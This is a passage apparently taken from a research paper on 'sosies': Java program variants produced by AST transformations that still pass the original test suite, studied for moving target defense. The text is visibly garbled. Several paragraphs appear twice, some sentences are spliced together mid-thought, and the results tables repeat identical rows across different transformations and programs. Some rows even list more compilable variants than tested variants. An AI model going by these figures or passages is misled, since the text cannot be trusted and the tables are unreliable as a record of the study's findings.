instead of transformations that would yield 100% of sosies, we study transformations that maximize the likelihood of finding interesting sosies. Consequently, a sosie synthesis is not performed through “any” code transformation. The transformation is carefully crafted with a clear objective in mind. It is not a random mutation but the voluntary modification of one piece of code. In this paper, we discuss sosiefication in general and 9 sosie synthesis transformations, which all have the objective of maximizing the likelihood of finding interesting sosies. If sosies can appear as mutants in the sense of mutation testing [6], we believe they are fundamentally different. The intention of the process is different: sosie synthesis aims at generating software diversity meant to be used in production while mutants for mutation testing are meant to simulate faults in order to improve the fault detection power of test suites. The intention of the transformations is different: mutation operators are meant to mimic faults while our transformations are meant to increase computation diversity while keeping the same observable behavior. 2.2 Synthesis of Software Sosies The sosiefication (sosie synthesis) process takes three kinds of input: a program for which one wants to generate sosies, the test suite for this program, and a program transformation. The transformation can optionally be configured or calibrated for the software under sosiefication. Then, the transformation is applied to generate as many program variants as needed. These program variants are candidate to be sosies. The variants are executed against the test suite to assert whether they actually do what they preserve the original functionality defined by the test suite. If the test suite passes, they are real sosies. Figure 1 illustrates this synthesis process. 2.3 Program Transformations for Sosiefication We propose source code transformations that are based on the modification of the abstract syntax tree (AST). As previous work [18] [20], we consider three families of transformation that manipulate statement nodes of the AST: 1) remove a node in the AST (Delete); 2) adds a node just after another one (Add); 3) replaces a node by another one, e.g. a statement node is replaced by another statement (Replace). For “Add” and “Replace”, the transplantation point refers to where a statement is inserted, the transplant statement refers to the statement that is copied and inserted and both transplantation and transplant points are in the same AST (we do not synthesize new code, nor take code from other programs). For “Add”, the transplantation point is a location between two existing statements, for “Replace”, it refers to the replacee, the statement that is replaced. The set of all statements that can transplanted at a given point are called transplant candidates. The transformations consisting of adding, replacing and deleting, random are called “add-Random”, “replace-Random” and “delete”. Those transformations provide us with a baseline to analyze the efficiency of sosiefication. Despite the simplicity of the delete/add/replace, it is still possible to perform several analyses to increase the likelihood of finding sosies within a given sample of variants. First, one can add preconditions on the statements to be added or replaced (Section 2.4). Second, one can exploit the fact that names have sense (Section 2.5). Third, one drive the addition and replacement with the information given by static type declarations (Section 2.6). All those analysis express a kind of compatibility between the transplantation point and the transplant statement. In total, we will define nine source code transformations. 2.4 Preconditions for “Add” and “Replace” There are different reasons for which a random add and replace fails at producing a compilable variant. In Java, for instance, the control flow must remain consistent (if not declared as returning “void”, a method has to contain a return statement). Hence we introduce different preconditions to limit the number of meaningless variants. First, the delete transformation never removes control flow AST nodes (e.g. return statements). Also, for replace and add, we enforce that: a statement cannot be replaced by itself; statements of type case, AST nodes of type variable instantiation, return, throw are only replaced by statements of the same type; the type of returned value in a return statement must be the same for the original and new statement. 2.5 Name-driven Sosiefication Program names are not random. They carry some meaning, some intention. Høst and Østvold have even shown that one can analyze programs based on the names that are used [13]. In the context of sosiefication, our intuition is that if one adds or replaces snippets that refer to similar identifiers, those that are compatible with a transplantation point. For example, for the snippet \texttt{bar(varA, 10 + i);}, the corresponding reaction is: input context: \texttt{[StaticType(varA), int]}; assuming that method \texttt{bar} returns a boolean, then the output context is: boolean. To use reactions in the code transformations, we first collect the reactions for each node in the AST. Then, to “Add” or “Replace” a node at transplantation point \(tp\), we look for a compatible transplant, i.e. a reaction which input context contains only types that are in the input context of \(tp\), and same thing for the output context. “Add” transformation then adds the transplant and keeps \(tp\), while “Replace” adds the transplant and removes \(tp\). To sum up: - **add-Reaction** adds an AST node that is type-compatible with the types of variables that are manipulated in the statement that just precedes the transplantation point. - **replace-Wittgenstein** replaces an AST node with a new one that refers to variables names that are used in the replace. In the spirit Høst and Østvold, their names refer to the philosopher Ludwig Wittgenstein and his idea that “meaning is use”. In a programming language context, this could be translated as names carry the type and even more, the domain semantics. By matching names, it is likely to transplant statements that manipulate close concepts. 2.6 Static Types for Sosiefication “Add” and “Replace” manipulate statements that refer to variables. In a programming language with static typing, 1) those variables must be declared somewhere in the current scope and 2) the expressions assigned to those variables must be consistent with the declared variable type. We propose to use the static typing information for driving the sosiefication transformations. The idea is that the transplant statements must refer to types for which there exists variables at the scope of the transplantation points. This is done in two phases. First a pre-processing step collects the types of variables for all statements of the program. Second, at transplantation time, the typing precondition is checked. With the former, we collect a set of program specific “reactions”. **Definition 3. Reaction.** A reaction characterizes a code snippet at a certain granularity in the AST (expression, statement, block). A reaction is a tuple formed of: 1) the list of all variable types that are used in the snippet, this is the input context; 2) the return type of the statement (or “void” if not), this is the snippet’s output context. At transplantation time, we draw in the set of all reactions those that are compatible with a transplantation point. Following up the biological metaphor of transplantation, the choice of the term reaction is made in reference to the reactions that drive the cell metabolism. In our case, they drive the sosiefication. For example, for the snippet \texttt{bar(varA, 10 + i);}, the corresponding reaction is: input context: \texttt{[StaticType(varA), int]}; assuming that method \texttt{bar} returns a boolean, then the output context is: boolean. To use reactions in the code transformations, we first collect the reactions for each node in the AST. Then, to “Add” or “Replace” a node at transplantation point \(tp\), we look for a compatible transplant, i.e. a reaction which input context contains only types that are in the input context of \(tp\), and same thing for the output context. “Add” transformation then adds the transplant and keeps \(tp\), while “Replace” adds the transplant and removes \(tp\). To sum up: - **add-Reaction** adds an AST node that is type-compatible with the types of variables that are manipulated in the statement that just precedes the transplantation point. \[\text{http://www.nature.com/scitable/topicpage/cell-metabolism-14026182}\] replace-Reaction replaces an AST node with a new one that is type-compatible with the variables names that are used in the replace. Once a transplantation’s reaction matches, it happens that the variable names mismatch. For this reason, we add a last step before transplantation: if two variables (one from the transplantation context and one that is used in the transplant) are compatible, we rename the variable reference of the transplant to the name defined in the transplantation context (if there are several possibilities, we pick randomly one). This is the essence of the two last sosiefication transformations “add-Steroid” and “replace-Steroid”. Compared to “add-Reaction” and “replace-Reaction”, they add variable renaming. They are “on steroids” in the sense that they give the best empirical results, in particular the fastest sosiefication speed (as shown in Section 3). add-Steroid adds an AST node that is type-compatible with the variables names and bound to existing variables of the transplantation point. replace-Steroid replaces an AST node with a new one that is type-compatible with the variables names and bound to existing variables of the transplantation point. To recap, we define nine sosiefication transformations: delete, add-Random, replace-Random, add-Wittgenstein, replace-Wittgenstein, add-Reaction, replace-Reaction, add-Steroid, replace-Steroid. They are not mutually exclusive, some pairs may overlap for some transplantation points and transplant candidates. Hence, there already is a small probability that two different transformations produce the very same sosie. 2.7 Additional Checks It is meaningless to modify code that is not executed. The resulting variants would be trivially sosies. Hence, we always check that the transplantation point is covered by the test suite, using the Jacoco library.4 Also, we aim at comparing the efficiency of the different transformations. Hence, we only consider transplantation points for which there is, at least, one compatible reaction for transplant (a reaction which input and output contexts match the ones of the transplantation point). 2.8 Outcome of the Sosie Synthesis Process The very last check of sosie synthesis consists in checking whether the variant program actually is a sosie. This is done as follows. First, we try to compile the variant AST. If the variant compiles, we then run all test cases in TS on the variant. If all test cases pass, the variant is a sosie (according to our definition of sosie), otherwise we call it a degenerated variant, and we throw it away. To sum up, the output of the process is as follows. First, we try to compile the variant AST. If the variant compiles, we then run all test cases in TS on the variant. If all test cases pass, the variant is a sosie (according to our definition of sosie), otherwise we call it a degenerated variant, and we throw it away. Putting it all together, we achieve the following objective: to gather knowledge on the sosiefication process. The existing body of knowledge on software mutation is biased against sosies. In particular, previous works have neither tried to maximize the number of sosies nor to evaluate the computational difference between variants. To our knowledge, only Schulte et al. have studied sosiefication, in the context of C code.28 It is an open question to know whether Schulte et al.’s findings apply to our transformations on object-oriented Java programs (see Sec 3.3.1). 3. EMPIRICAL INQUIRY ON SOSIEFICATION We now present our experiments on sosies. Our main objective is to gather knowledge on the sosiefication process. The existing body of knowledge on software mutation is biased against sosies. In particular, previous works have neither tried to maximize the number of sosies nor to evaluate the computational difference between variants. To our knowledge, only Schulte et al. have studied sosiefication, in the context of C code.28 It is an open question to know whether Schulte et al.’s findings apply to our transformations on object-oriented Java programs (see Sec 3.3.1). 3.1 Analysis Criteria In essence, sosiefication is a search problem, where the search space is the set of all possible program variants obtainable with a given transformation. Hence, sosiefication consists of navigating the search space of program variants, looking for the ones that are identical with respect to the test suite. The navigation is done through small steps, where a step is the application of a code transformation. The application of a transformation is more or less likely to produce sosies as mentioned in Section 3.1. Put another way, transformation rules slice the global search space of variants, to http://www.eclemma.org/jacoco/ define the search space of a given transformation. If the resulting space is dense in terms of sosies, it means that the transformation is often successful in finding sosies. On the other hand, if the space sparsely contains sosies, applying the transformation would rarely yield sosies. What is really costly in navigating the sosiefication search space is the time to compile the program and even worse, the time to run the test suite (as shown in Table 1). Hence, navigation cost dominated by checking whether the variant is actually a sosie. This is similar to what happens for program repair as shown by Weimer et al. [29]. Consequently, if the search space defined by a transformation is dense in sosies, one decreases the global time spent in assessing degenerated-variants. This point may seem theoretical but it has a very practical application. From an engineering perspective, one always want to do the maximum for a given budget. For an engineering team setting up moving target defense, the goal is to find as many sosies as possible within a given time or budget of computation resources. If the team can have 1000 sosies instead of 500 that would be better. This is equivalent to synthesizing space that are dense in sosies. Our first objective is to identify sosie synthesis transformations defining a search space that is dense in sosies. For moving target defense, what matters is to create an execution profile that is as much unpredictable as possible. This requires engineering variants of source code that are identical to the original, with respect to the observed behavior, but that also produce executions that are different from the original. The second objective of this evaluation is to assess whether the synthesized sosies are computationally diverse. We can sum our research questions as: RQ1. Do previous results on creating sosies in imperative programs hold for our new tailored transformations on object-oriented programs? We replicate the same kind of experiment as Schulte et al. [26], but we change the transformations and the dataset (different programs, different programming language) (see Section 3.3.1). RQ2. What are the best sosiefication transformations with respect to the density of sosies? The baseline here is “add-Random”, “replace-Random” and “delete” (see Section 3.3.2). RQ3. Are sosies computationally diverse, i.e. do they exhibit executions that are different from the original program? This requires having a definition of “computationally diverse”, we present two of them in Section 3.2.2. 3.2 Experimental Design 3.2.1 Dataset We sosiefy 9 widely-used open source projects. The inclusion criteria are that: 1) they come with a good test suite according to the statement coverage (> 70%); 2) they are written in Java and are correctly handled by the source code analysis and transformation library we use (Spoon [22]). All test suites are implemented in JUnit, except in the case of Clojure. Clojure is a Lisp-like interpreter, thus the test suite is a set of Lisp programs. Table 1 gives the essential metrics on this dataset. The programs range from 1 to 80 KLOC. Given the critical role of test suites in the sosiefication process, we provide a few statistics about the test suites of each program. All test suites have a high statement coverage. To us, test suites with many assertions and high coverage indicate an important effort and care put into their design. Table 1 also provides the number of statements for each program. Since all our sosiefication transformations manipulate statement for transcription, this number is an indicator of the size of the search space for sosiefication. We also provide the time (in seconds) to compile the program and run the test suites. It is important since the time of sosiefication is dominated by the time to compile variants and check they are sosies (by running the test suite). The times are computed on the same machine in the same idle state, using an unmodified version of the program and test suite. 3.2.2 Protocol Sosiefication. The experimental protocol is described in Algorithm 4. Sources of all programs used in our experiments are available here: [http://diversify-project.eu/sosiefied-programs/](http://diversify-project.eu/sosiefied-programs/) CPU: Intel Xeon Processor W3540 (4 core, 2.93 GHz), RAM: 6GB Data: $P$, a program we want to sosiefy Result: data for table 2 1. $S = \{\text{statements in the AST of } P\}$ 2. $R = \{\text{reactions extracted from the } P\}$ while resources available do 4. randomly select a transplantation point $stmt \in S$ 5. $Comp_R \leftarrow \{ r \in R \mid r \text{ is compatible with } stmt \}$ 6. if $Comp_R \neq \emptyset$ then 7. foreach $t$ in the 9 transformations do 8. if $t$ requires a reaction then 9. select a random one in $Comp_R$ 10. variant $\leftarrow$ application of $t$ on $stmt$ 11. compile $t$ 12. check if the variant is a sosie 13. if yes, save it for future analysis 14. end 15. end 16. end Algorithm 1: The experimental protocol for evaluating our 9 sosiefication transformations the search space nor to have a fixed sample. Our computation platform is Grid5000, a scientific platform for parallel, large-scale computation [2]. We submit one batch for each program, they run as long as resources (CPU and memory) are available. We look for sosies as long as we have available free computing slots on Grid5000. This protocol samples the search space of all possible statement transformations at two levels: (1) sample the transplantation points (those statements for which there is at least one compatible reaction, line 4 of Algorithm 1); (2) given a statement selected as a transplantation point, sample the set of transplant candidates (line 8 of Algorithm 1). Eventually, we obtain a number of sosies for each software application under study. In addition to that, we know the number of transplantation points that were tried and the number of ill-formed variants that do not compile. By carefully characterizing the two levels of sampling, this enables us to answer our 3 research questions. Computation monitoring. We quantify computation diversity by measuring method calls diversity and variable diversity. At each method entry, we log the method signature (class name, method signature) to gather one sequence of method calls for each execution. A difference between the sequence of the original program and a sosie indicates method calls diversity. This metric has been shown to be a relevant way of capturing the "sense of self" of a program and distinguish it from another implementation by Forrest et al. [8]. The values of all data (variables, parameters, attributes) in the current scope are logged at each control point (conditional, loop). For object variables, we collect their string representation (i.e. the return value of method toString() in Java). A difference between sequence of variable values of the original program and a sosie, indicates variable diversity. Trace comparison is performed as described in algorithm 2. The "cleaning" step in line 5 of algorithm 2 looks for data or method calls, which always change from one run to another (e.g., temporary files generating during execution always have a different name) in order to discard them in the comparison. 3.3 Findings Table 2 gives the key metrics of the experiments to answer research questions #1, #2, #3. The left-hand side columns of the table give the names of the software application under study and the names of the considered sosiefication transformations. The column “tested_stmt” in table 2 provides data about the first level of sampling: the number of unique statements in the program on which we execute the sosiefication transformations (in parenthesis, the ratio over the total number of candidate statements). The column “candidate” is the sum of transplant candidates over all the tested statements, it is the size of the search space of the second level of sampling mentioned in 3.2.2. Its formula is given in footnote. The column “variant” is the number of unique actual transformations that have been performed (e.g., if the same transformation is applied twice on the same transplantation point, this counts as one variant). The column “compile” is the number and ratio of variants that compiled. The column “sosies” is the number of variants that are actual sosies. The column “sosie density” is the ratio of sosies found among all the variants. This sosie ratio found in a random sample of the complete search space (the ratio in the ‘variant’ column is the proportion of the complete search space actually explored) is an estimate of the sosie density for a given transformation. The column ‘sosies/h’ is an approximation of the number of sosies that our implementation generates per hour (based on compilation and test times of table 1). For “rand” transformations: #candidates = #tested_stmt * #stmt_in_prog For “Reaction” transformations: #candidates = sum #tested_stmt (#compatible_reactions) For “Wittgenstein” transformations: #candidates = sum #tested_stmt (#compatible_stmts) For “Steroid” transformations: #candidates = sum #tested_stmt (#compatible_reactions * #variable_mappings) For deletion, the number of candidates is simply #tested_stmt, since for each tested statement, there was a single candidate for the transformation. <table> <thead> <tr> <th>metrics</th> <th>#tested statements</th> <th># candidate</th> <th># tested variants</th> <th># compilable</th> <th># sosies</th> <th>sosie density</th> <th>sosies/h</th> </tr> </thead> <tbody> <tr> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> </tr> <tr> <td>add-Steroid</td> <td>686 (40%)</td> <td>50854</td> <td>7685 (1%)</td> <td>2518 (38%)</td> <td>1264 (1)%</td> <td>10%</td> <td>48.5</td> </tr> <tr> <td>add-Wittgenstein</td> <td>686 (15%)</td> <td>72597</td> <td>5593 (8%)</td> <td>7685 (1%)</td> <td>1264 (1)%</td> <td>10%</td> <td>48.5</td> </tr> <tr> <td>add-Reaction</td> <td>686 (15%)</td> <td>808640</td> <td>9957 (&lt;1%)</td> <td>7685 (1%)</td> <td>1264 (1)%</td> <td>10%</td> <td>48.5</td> </tr> <tr> <td>replace-Steroid</td> <td>686 (15%)</td> <td>72597</td> <td>5593 (8%)</td> <td>7685 (1%)</td> <td>1264 (1)%</td> <td>10%</td> <td>48.5</td> </tr> <tr> <td>replace-Wittgenstein</td> <td>686 (15%)</td> <td>72597</td> <td>5593 (8%)</td> <td>7685 (1%)</td> <td>1264 (1)%</td> <td>10%</td> <td>48.5</td> </tr> <tr> <td>replace-Reaction</td> <td>686 (15%)</td> <td>808640</td> <td>9957 (&lt;1%)</td> <td>7685 (1%)</td> <td>1264 (1)%</td> <td>10%</td> <td>48.5</td> </tr> <tr> <td>delete</td> <td>686 (15%)</td> <td>686 (100%)</td> <td>686 (1%)</td> <td>2439 (64%)</td> <td>394 (10%)</td> <td>20%</td> <td>10.9</td> </tr> <tr> <td>add-Steroid</td> <td>1263 (10%)</td> <td>8383912305</td> <td>1076(&lt;1%)</td> <td>266 (25%)</td> <td>143 (13%)</td> <td>11%</td> <td>11.2</td> </tr> <tr> <td>add-Wittgenstein</td> <td>1263 (10%)</td> <td>8383912305</td> <td>1076(&lt;1%)</td> <td>266 (25%)</td> <td>143 (13%)</td> <td>11%</td> <td>11.2</td> </tr> <tr> <td>add-Reaction</td> <td>1263 (10%)</td> <td>8383912305</td> <td>1076(&lt;1%)</td> <td>266 (25%)</td> <td>143 (13%)</td> <td>11%</td> <td>11.2</td> </tr> <tr> <td>replace-Steroid</td> <td>1263 (10%)</td> <td>8383912305</td> <td>1076(&lt;1%)</td> <td>266 (25%)</td> <td>143 (13%)</td> <td>11%</td> <td>11.2</td> </tr> <tr> <td>replace-Wittgenstein</td> <td>1263 (10%)</td> <td>8383912305</td> <td>1076(&lt;1%)</td> <td>266 (25%)</td> <td>143 (13%)</td> <td>11%</td> <td>11.2</td> </tr> <tr> <td>replace-Reaction</td> <td>1263 (10%)</td> <td>8383912305</td> <td>1076(&lt;1%)</td> <td>266 (25%)</td> <td>143 (13%)</td> <td>11%</td> <td>11.2</td> </tr> <tr> <td>delete</td> <td>1263 (10%)</td> <td>1263 (100%)</td> <td>726 (57%)</td> <td>115 (9%)</td> <td>3 (3%)</td> <td>0.3%</td> <td>3.8</td> </tr> </tbody> </table> | common-lang | | | | | | | | | | 50854 | 7685 (1%) | 2518 (38%) | 1264 (1)% | 10% | 48.5 | 48.5 | | delete | 686 (15%) | 686 (100%) | 686 (1%) | 2439 (64%) | 394 (10%) | 20% | 10.9 | | add-Steroid | 1263 (10%) | 8383912305 | 1076(<1%) | 266 (25%) | 143 (13%) | 11% | 11.2 | | add-Wittgenstein | 1263 (10%) | 8383912305 | 1076(<1%) | 266 (25%) | 143 (13%) | 11% | 11.2 | | add-Reaction | 1263 (10%) | 8383912305 | 1076(<1%) | 266 (25%) | 143 (13%) | 11% | 11.2 | | replace-Steroid | 1263 (10%) | 8383912305 | 1076(<1%) | 266 (25%) | 143 (13%) | 11% | 11.2 | | replace-Wittgenstein | 1263 (10%) | 8383912305 | 1076(<1%) | 266 (25%) | 143 (13%) | 11% | 11.2 | | replace-Reaction | 1263 (10%) | 8383912305 | 1076(<1%) | 266 (25%) | 143 (13%) | 11% | 11.2 | | delete | 1263 (10%) | 1263 (100%) | 726 (57%) | 115 (9%) | 3 (3%) | 0.3% | 3.8 | | common-math | | | | | | | | | | 50854 | 7685 (1%) | 2518 (38%) | 1264 (1)% | 10% | 48.5 | 48.5 | | delete | 686 (15%) | 686 (100%) | 686 (1%) | 2439 (64%) | 394 (10%) | 20% | 10.9 | | add-Steroid | 1263 (10%) | 8383912305 | 1076(<1%) | 266 (25%) | 143 (13%) | 11% | 11.2 | | add-Wittgenstein | 1263 (10%) | 8383912305 | 1076(<1%) | 266 (25%) | 143 (13%) | 11% | 11.2 | | add-Reaction | 1263 (10%) | 8383912305 | 1076(<1%) | 266 (25%) | 143 (13%) | 11% | 11.2 | | replace-Steroid | 1263 (10%) | 8383912305 | 1076(<1%) | 266 (25%) | 143 (13%) | 11% | 11.2 | | replace-Wittgenstein | 1263 (10%) | 8383912305 | 1076(<1%) | 266 (25%) | 143 (13%) | 11% | 11.2 | | replace-Reaction | 1263 (10%) | 8383912305 | 1076(<1%) | 266 (25%) | 143 (13%) | 11% | 11.2 | | delete | 1263 (10%) | 1263 (100%) | 726 (57%) | 115 (9%) | 3 (3%) | 0.3% | 3.8 | Steroid transformations ("add-Steroid", "replace-Steroid"). "Steroid" are our champions. Wittgenstein", "Steroid" are similarly efficient or not. Redistributions of compilation ratios and sosie density according to Table 3: The measuring of computational diversity w.r.t calls and data on a random sample of sosies. <table> <thead> <tr> <th>#sosie</th> <th>diversity</th> <th>call diversity</th> <th>var. diversity</th> <th># of diverse test cases (call div.)</th> <th># of diverse test cases (var. div.)</th> </tr> </thead> <tbody> <tr> <td>easymock</td> <td>465</td> <td>218 (46.88%)</td> <td>161 (34.62%)</td> <td>139 (29.89%)</td> <td>34.61</td> </tr> <tr> <td>dagger</td> <td>481</td> <td>322 (66.94%)</td> <td>319 (66.32%)</td> <td>19 (3.95%)</td> <td>6.32</td> </tr> <tr> <td>junit</td> <td>446</td> <td>205 (45.96%)</td> <td>194 (43.5%)</td> <td>95 (21.3%)</td> <td>148.86</td> </tr> </tbody> </table> 3.3.1 RQ1. Do previous results on creating sosies in imperative programs hold for our new tailored transformations on object-oriented programs? Schulte et al. [26] have shown the existence of sosies in the context of imperative C code. Our experiments confirm this fact with many experimental variables that are changed. First, our experiments are on Java, which is a different programming language, object-oriented, with richer data types and stronger typing. Second, our dataset covers different application domains. Third, our transformations are more sophisticated. Our results are thus a semi-replication. On the one hand, we confirm the results of Schulte et al. [26] on the same kind of experiment. On the other hand, we show that sosies exist in very large quantities in a different context (different language, different dataset). We have synthesized a total of 30,184 sosies over all programs and all kinds of transformation. As particular examples, we notice 6072 sosies for Jbehave or 1287 sosies for EasyMock with "Steroid" transformations ("add-Steroid", "replace-Steroid"). Globally, table 3 shows that we synthesized sosies for all programs and with any type of transformation. Even if the quantities of sosies largely vary depending on the programs and transformations, the numbers are not in the dozens but in the hundreds, except for dagger. This reassures us on the adequacy of software sosies for controlled unpredictability in the context of moving target defense for object-oriented programs. 3.3.2 RQ2. What are the code transformations that confine the densest spaces for sosiefication? Column "candidate" of Table 3 gives the size of search space associated with each transformation (abstracting over the search space of transplantation points: we consider the same set of transplantation points for all transformations). Hence, by dividing the number of synthesized sosies by the number of explored candidates (column "variant"), we obtain an approximation of the density of sosies within this search space. This density is the key metric for answering our research question. We first analyze the problem according to the type of analysis, i.e. whether the strategies "Rand", "Reaction", "Wittgenstein", "Steroid" are similarly efficient or not. Recall that strategies "Rand" are our baseline and strategies "Steroid" are our champions. Compilation rates for the baseline transformations, "add-Rand", "replace-Rand", are low (most of the generated variants do not even compile), also, most of the compilable variants are not sosies. They set the baseline density at approximately 10%. Adding analysis over variable names ("Wittgenstein") or variable types ("Reaction") immediately improves both compilation and density: respectively 39% and 36% increase in compilation rate, and 4.8% and 3.8% increase in density. The empirical results show that the matching of variables names ("Wittgenstein") makes sense. This indicates that the variables names carry meaning. Our results show that transplanting a variable with the same name, at different place in the programs tends to preserves the compilation and execution semantics of the program. This confirms previous results on name-based program analysis [13, 23]. Interestingly, the sosie density of "Wittgenstein" against "Steroid" (our champions) is not that different. This is an important result: it shows that it should be possible to efficiently create sosies in dynamic languages. The transformations on "Steroid" use both the type-based reactions and a mapping of variable names. "Steroid" transformations ("add-Steroid" and "replace-Steroid") give in average the best results both in terms of compilation rates and density. The density of the search space of "add-Steroid" and "replace-Steroid" is higher than the density of the baseline transformations "add-Rand", "replace-Rand" and "delete". For instance, for JUnit, the density of "add-Steroid" is 24% while the density of "add-Rand" is 8%. This can be rephrased: the likelihood of finding a sosie increases from 8% to 24%. Yet there is a noticeable difference between "add-Steroid" and "replace-Steroid" on all programs. This is not only for "Steroid", for all types of analysis ("Steroid", "Reaction", etc), we observe a similar trend: "add" creates denser search space compare to "replace". We explain it by the effect size of a replace: it is conceptually one delete and one add, which means that the transformation combines the behavioral effects of both. Consequently, it is less likely that those stacked behavioral changes are considered equivalent with respect to the expected behavior encoded in the test suite. Let us now analyze the results under the perspective of the family of transformations ("delete", "add", "replace"). "delete", which straight forward and purely random, generates a large quantity of variants that compile as well as high quantity of sosies compared to random transformations, both in absolute numbers and rates (between 5% and 10% of the variants synthesized with "delete" are sosies). This means that there is a lot of redundant or optional code in tested statements (recall that we only delete statements that are executed at least by one test case). When "add" and "replace" transformations produce compilable variants, they are more often sosies: the search space is denser. This is especially true for "add", which globally achieves the highest sosie density. This can be explained by the fact that the behavior added by the transplant is outside of the expected behavioral envelop defined by the test suite. "Reaction", "Wittgenstein" and "Steroid" transformations select candidates based on some definition of compatibility (type or name-based). Consequently, the number of transplant candidates at each transplantation point is much lower than for the random versions, which explains the increased density. Table 3 gives the results of this pilot experiment. It gives the percentage of sosies on which we observe a call diversity or a variable diversity (as explained in Section 3.2.2). This data indicates that there are indeed a large quantity of sosies that exhibit differences in computation: 67%, 47%, 46% of sosies in Dagger, EasyMock and JUnit respectively exhibit at least one difference in data or method calls, compared to the original program. We also notice a great disparity in the nature of diversity between the programs. While a vast majority of the computationally diverse sosies of Dagger vary on method calls, they are much more balanced between method calls and data for EasyMock and JUnit. The last two columns of the table give the mean number of test cases for which we observe a difference. These data indicate that computation diversity is not isolated and can be very important (as is the case for JUnit). What about the sosies for which we do not observe any computation diversity? We see two possible answers. First, our first implementation does not monitor everything single bits of execution data, we only focus on two specific monitoring points. If the execution difference lies somewhere else, we do not see it. Second, those sosies might be useless sosies. For instance, a sosie whose only difference is to print a message to the console might be irrelevant in many cases. If we are not capable of assessing their computational diversity, they are not likely to hinder the execution predictability for an attacker. 3.4 Threats to Validity We performed a large scale experiment in a relatively unexplored domain. We now present the threats to the validity of our findings. First, the quality of the test suite of each program has a major impact on our findings. The more precise the test suite is (large number of relevant test scenarios and data, and as many assertions as needed to model the expected properties), the more meaningful the sosies are. To our knowledge, characterizing the quality of assertions in test cases (i.e. qualifying how well a test suite expresses the expected behavior) is still an open question. To mitigate this threat, we did our best to select programs for which the test suite was known to be strong in terms of coverage or reputation (the Apache foundation, which hosts all the commons libraries, has very strong rules about code quality). Second, our findings might not generalize to all types of applications. We selected frameworks and libraries because of their popularity. Again, we are contributing to explore a new domain (computationally diverse sosie programs), and further experiments are required to confirm our findings and extend them with other application domains, programming languages (loosely-typed languages might perform differently), and computing platforms. The last threat lies in our experimental framework. We have built a tool for program transformation and relied on the Grid5000 infrastructure to run millions of transformations. We did extensive testing of our code transformation infrastructure, built on top of the Spoon framework that has been developed, tested and maintained for over more than 10 years. However, as for any large scale experimental infrastructure, there are surely bugs in this software. We hope that they only change marginal quantitative things, and not the qualitative essence of our findings. Our infrastructure is publicly available at http://bit.ly/1yctzJ8. Finally, to further reassure us on the meaningfulness of smaller than for “rand”, which can use any statement in the program as a transplant. For instance, over all 669 tested transplantation points, the search space of “Steroid” consists of 7754 potential variants, which is much smaller than the two millions (1949466) candidates for “add-Rand”. Recall that there are two levels of sampling: on the transplantation points, and on the transplants; to some extent, there are two nested search space. Our results show that program analysis (“Wittgenstein”, “Reaction”, “Steroid”) drastically reduces the size of the transplant search space as shown by column candidate of table 2. This is probably the key factor behind the increase in density. It is interesting to notice the exceptions of collections and maths, which have huge sets of candidates. These exceptions occur because of a couple of statements with very large input contexts. For example, in commons.collections we found a statement with ``` [int × 9, strMatcher × 3, char × 2, boolean × 2, strBuilder × 1, char × 1, List × 1, StrSubstitutor × 1] that was replaced by a reaction: [int × 6, strMatcher × 3, char × 2, boolean × 2, strBuilder × 1, char × 1, List × 1, StrSubstitutor × 1], leading to 9^6 × 3^2 × 2^2 × 1^1 × 1^1 × 1^1 = 4.4 × 10^9 candidates for a single transplant. ``` A consequence of our budget based approach is that, for small programs, the search space is small enough to allow an almost exhaustive search. For instance, in project Dagger, for all “Wittgenstein”, “Reaction” and “Steroid transformations”, we have tested between 85% and 95% of transplant candidates on 89.5% of all statements that can be transformed. The last column “sosies/h” (per hour), represents the sosiefication speed. The sosiefication speed is for a given machine, the sum of the time spent to generate # variants with transformations, the time spent to compile them, and the time spent to run the test suite on the compilable ones, everything divided by the number of found sosies. This time is only indicative. There is a direct link between the density and the speed. For a given implementation and computer, if the space is denser, sosies can be found more often. In our implementation, the order of magnitude of the sosiefication speed is several dozens per hour. For instance, “add-Steroid” enables us to mine 85 sosies per hour in average for JUnit. With respect to this evaluation criterion, “Steroid” transformations are the fastest, going up to 92 sosies per hour for “add-Steroid” on EasyMock. Following our metaphor, there is a boosting effect of our transformation steroids on the sosiefication speed. 3.3.3 RQ3. Are sosies computationally diverse, i.e. exhibit executions that are different from the original program? To answer RQ3, we examine the results of the execution of sosies on a sample of all sosies synthesized for Dagger, EasyMock and JUnit (independently of the transformation that is used). The random sampling ensures that the sample contains sosies generated with any of transformation. We only consider three projects for sake of time before the deadline. The number of sosies in each sample is in the second column of Table 3. We ran the test suites on all these sosies and observed 21,255,821, 48,982 and 989,152 method calls as well as 140,902, 13,300 and 70,913 data points for JUnit, Dagger and EasyMock respectively. sosies, we ran the test suites of JFreechart, PMD and commons-math on a sample of 100 sosies of JUnit. In other terms, we applied moving target to the testing infrastructure itself. The test suites ran correctly in 80% of the cases. For the reader who would like to run his own test suites using one sosie of JUnit, they are available for download at http://diversify-project.eu/junit-sosies/. 4. RELATED WORK Mutational robustness [20] is closely related to sosie synthesis. Schulte et al say that software is robust to mutations, we say that there exists transformations that introduce valuable computational diversity. While Schulte et al. use only random operations, we explore several types of analysis and their impact on the probability of sosie synthesis. While, Schulte et al. evaluate the effect of computation diversity to proactively repair bugs present in the original program, we provide a first quantitative evaluation about the presence of computational diversity. Jiang et al. [15] identify semantically equivalent code fragments, based on input/output equivalence. They automatically extract code fragments from a program and generate random inputs to identify the fragments that provide the same outputs. Similarly to our approach, program semantics is defined through testing: random input test data for Jiang et al. test scenarios and assertions in our case. However, we synthesize the equivalent variants, and quantify the computational diversity, while Jiang et al. look for naturally equivalent fragments and do not characterize their diversity. More generally, sosie synthesis is related to automatic generation of software diversity. Since the early work by Forrest et al. [9], advocating the increase of large-scale diversity in software, many researchers have explored automatic software diversification. System Randomization. A large number of randomization techniques at the systems level aim at defeating attacks such as code injection, buffer overflow or heap overflow [20, 27]. The main idea is that random changes from one machine to the other, or from one program load to the other, reduces the predictability and vulnerability of programs. For instance, instruction set randomization [16, 1] generates process-specific randomized instruction sets so the attacker cannot predict the language in which injected code should be written. Lin et al. [19] randomize the data structure layout of a program with the objective of generating diverse binaries that are semantically equivalent. While this previous work focuses on transforming a program’s execution environment while preserving semantic equivalence, we work on transforming the program’s source code, looking for computation diversity. Application-level diversity. Several authors have tackled automatic diversification of application code. Feldt [7] has successfully experimented with genetic programming to automatically diversify controllers, and managed to demonstrate failure diversity among variants. Foster and Somayaji [10] have developed a genetic algorithm that recombines binary files of different programs in order to create new programs that expose new feature combinations. From a security perspective, Cox et al. [6] propose the N-variant framework that executes a set of 